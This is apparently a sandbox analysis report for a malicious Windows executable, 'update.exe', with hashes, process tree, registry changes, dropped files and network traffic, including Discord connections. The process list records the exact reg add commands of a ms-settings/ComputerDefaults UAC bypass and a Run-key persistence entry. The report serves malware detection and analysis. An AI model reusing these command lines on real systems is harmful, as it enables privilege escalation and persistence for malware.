| File name: | update.exe |
| Full analysis: | https://app.any.run/tasks/a016880c-49b5-4067-9d6b-1a5f89c7a9ad |
| Verdict: | Malicious activity |
| Analysis date: | September 13, 2025, 21:54:50 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32+ executable (GUI) x86-64, for MS Windows, 7 sections |
| MD5: | CE6EAC9F045F50A69576C46A4EAF3383 |
| SHA1: | E7448F5D4D18EA4F6908AD3EAAE5585C2247FAEF |
| SHA256: | 5A3EB454E8B5A4006115F6453BD59AF02FD700E72A9CA12C6C186DF143797B60 |
| SSDEEP: | 393216:C37afs1dGNL+CzBibvjN6w8GaB/9n7M0o4Q:C3yQ2acOjN1a5N |
| .exe | | | Win64 Executable (generic) (87.3) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (6.3) |
| .exe | | | DOS Executable Generic (6.3) |
| MachineType: | AMD AMD64 |
|---|---|
| TimeStamp: | 2025:09:13 21:46:48+00:00 |
| ImageFileCharacteristics: | Executable, Large address aware |
| PEType: | PE32+ |
| LinkerVersion: | 14.44 |
| CodeSize: | 179712 |
| InitializedDataSize: | 125952 |
| UninitializedDataSize: | - |
| EntryPoint: | 0xda30 |
| OSVersion: | 6 |
| ImageVersion: | - |
| SubsystemVersion: | 6 |
| Subsystem: | Windows GUI |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 320 | "C:\Users\admin\Desktop\update.exe" | C:\Users\admin\Desktop\update.exe | update.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
| 1100 | "C:\WINDOWS\system32\ComputerDefaults.exe" --nouacbypass | C:\Windows\System32\ComputerDefaults.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Set Program Access and Computer Defaults Control Panel Exit code: 3221226540 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1356 | reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1380 | "Dependences.exe" | C:\Users\admin\Doxxing uhq\Dependences.exe | Dependences.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
| 1440 | wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text | C:\Windows\System32\wevtutil.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Eventing Command Line Utility Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1468 | "C:\Users\admin\Desktop\update.exe" | C:\Users\admin\Desktop\update.exe | ComputerDefaults.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 1 Modules
| |||||||||||||||
| 1520 | C:\WINDOWS\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\admin\Desktop\update.exe" /f" | C:\Windows\System32\cmd.exe | — | update.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1592 | "C:\Users\admin\Doxxing uhq\Dependences.exe" | C:\Users\admin\Doxxing uhq\Dependences.exe | — | Dependences.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 1668 | reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\admin\Doxxing uhq\Dependences.exe" /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1948 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (4044) reg.exe | Key: | HKEY_CLASSES_ROOT\ms-settings\shell\open\command |
| Operation: | write | Name: | DelegateExecute |
Value: | |||
| (PID) Process: | (3288) ComputerDefaults.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (3288) ComputerDefaults.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (3288) ComputerDefaults.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (5032) reg.exe | Key: | HKEY_CLASSES_ROOT\ms-settings\shell\open\command |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (5032) reg.exe | Key: | HKEY_CLASSES_ROOT\ms-settings\shell\open |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (5032) reg.exe | Key: | HKEY_CLASSES_ROOT\ms-settings\shell |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (5032) reg.exe | Key: | HKEY_CLASSES_ROOT\ms-settings |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (320) update.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
| Operation: | write | Name: | Update Dependencies |
Value: C:\Users\admin\Doxxing uhq\Dependences.exe | |||
| (PID) Process: | (1356) reg.exe | Key: | HKEY_CLASSES_ROOT\ms-settings\shell\open\command |
| Operation: | write | Name: | DelegateExecute |
Value: | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4444 | update.exe | C:\Users\admin\AppData\Local\Temp\_MEI44442\Crypto\Cipher\_raw_blowfish.pyd | executable | |
MD5:403A4F70938F58C15DAEB4A63D7ECADB | SHA256:FB407812E3E4D17B2CA981C8B95C716FF1B288A5E4658A831CD067A2837A753B | |||
| 4444 | update.exe | C:\Users\admin\AppData\Local\Temp\_MEI44442\Crypto\Cipher\_raw_aes.pyd | executable | |
MD5:61CB04BF8E8C111AB4B6FED3BE0E8FA9 | SHA256:DD5A327AF8913D4B772E37ABB1FB7E0F74D4CE0E5850EB06A4329720FC159175 | |||
| 4444 | update.exe | C:\Users\admin\AppData\Local\Temp\_MEI44442\Crypto\Cipher\_raw_arc2.pyd | executable | |
MD5:530BB99610B35527C3B06A22FD92CCEC | SHA256:43BC2F864D062BF7FE940E9CC497EF4FDFCC6EAEAB95FD4D4EE837E4D5DE0437 | |||
| 4444 | update.exe | C:\Users\admin\AppData\Local\Temp\_MEI44442\Crypto\Cipher\_Salsa20.pyd | executable | |
MD5:17C99EDF022309BC2C54A732FB8FBF26 | SHA256:34EB9C505180358711D8D6268E3F0E700C58AC9F47B0AD68565ED73BAB5DBD81 | |||
| 4444 | update.exe | C:\Users\admin\AppData\Local\Temp\_MEI44442\Crypto\Cipher\_chacha20.pyd | executable | |
MD5:709BE56D3AE0CB50807A6B54A762C875 | SHA256:612B4DA235E04CB9CE0106A13AA31AB7D5F651A0685653EDC9A57E1F93BE5670 | |||
| 4444 | update.exe | C:\Users\admin\AppData\Local\Temp\_MEI44442\Crypto\Cipher\_pkcs1_decode.pyd | executable | |
MD5:B5600245089E36B00E9FB4F4327A9F5F | SHA256:61F554613F2377EF0CF192F4C329CE448560429118115179EA03B2BAA4C2E7E1 | |||
| 4444 | update.exe | C:\Users\admin\AppData\Local\Temp\_MEI44442\Crypto\Cipher\_raw_aesni.pyd | executable | |
MD5:133B156E060C77AF41B38841A32DA4B6 | SHA256:20005B988FE848983A65F7F4727EC27148E4D0ABEAB9CFD0E58778F812BF7595 | |||
| 4444 | update.exe | C:\Users\admin\AppData\Local\Temp\_MEI44442\Crypto\Cipher\_raw_cfb.pyd | executable | |
MD5:BF18D19EB79557E767A8E8E1EDA6C060 | SHA256:6DE05E3507157C94F20825196677E12964780502D5A3DD04424B05C3E4AEF186 | |||
| 4444 | update.exe | C:\Users\admin\AppData\Local\Temp\_MEI44442\Crypto\Cipher\_raw_ctr.pyd | executable | |
MD5:3D0FB2250C76B501ABF008D8E6180594 | SHA256:E5E2B54591D4CA2DC43F6D0FFDBFF45393D092E9E37C072FFE7B8769EEC3B82E | |||
| 4444 | update.exe | C:\Users\admin\AppData\Local\Temp\_MEI44442\Crypto\Cipher\_raw_cbc.pyd | executable | |
MD5:088A5FDA312EC2E1957E83D530F9BB8F | SHA256:FD5AC5C38172A303A274D2B8D1E9B794380773F50350453EAE3117724134EDE1 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5944 | MoUsoCoreWorker.exe | GET | 200 | 23.48.23.164:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | DE | binary | 825 b | whitelisted |
6388 | RUXIMICS.exe | GET | 200 | 23.48.23.164:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | DE | binary | 825 b | whitelisted |
1268 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | NL | binary | 814 b | whitelisted |
6388 | RUXIMICS.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | NL | binary | 814 b | whitelisted |
— | — | POST | 200 | 20.190.160.4:443 | https://login.live.com/RST2.srf | US | xml | 1.24 Kb | unknown |
5944 | MoUsoCoreWorker.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | NL | binary | 814 b | whitelisted |
— | — | POST | 400 | 20.190.160.4:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | unknown |
— | — | POST | 400 | 40.126.32.136:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | unknown |
— | — | POST | 400 | 40.126.32.136:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | unknown |
— | — | POST | 400 | 40.126.31.129:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
5944 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6388 | RUXIMICS.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1268 | svchost.exe | 23.48.23.164:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
5944 | MoUsoCoreWorker.exe | 23.48.23.164:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
6388 | RUXIMICS.exe | 23.48.23.164:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
1268 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
6388 | RUXIMICS.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
login.live.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
x1.c.lencr.org |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
2200 | svchost.exe | Misc activity | ET INFO Observed Discord Domain in DNS Lookup (discord .com) |
1380 | Dependences.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |
1380 | Dependences.exe | Misc activity | ET INFO Observed Discord Service Domain (discord .com) in TLS SNI |
1380 | Dependences.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |
1380 | Dependences.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |
1380 | Dependences.exe | Misc activity | ET INFO Observed Discord Service Domain (discord .com) in TLS SNI |
1380 | Dependences.exe | Misc activity | ET INFO Observed Discord Service Domain (discord .com) in TLS SNI |
1380 | Dependences.exe | Misc activity | ET INFO Observed Discord Service Domain (discord .com) in TLS SNI |
2200 | svchost.exe | Misc activity | ET INFO Discord Chat Service Domain in DNS Lookup (discord .com) |
1380 | Dependences.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |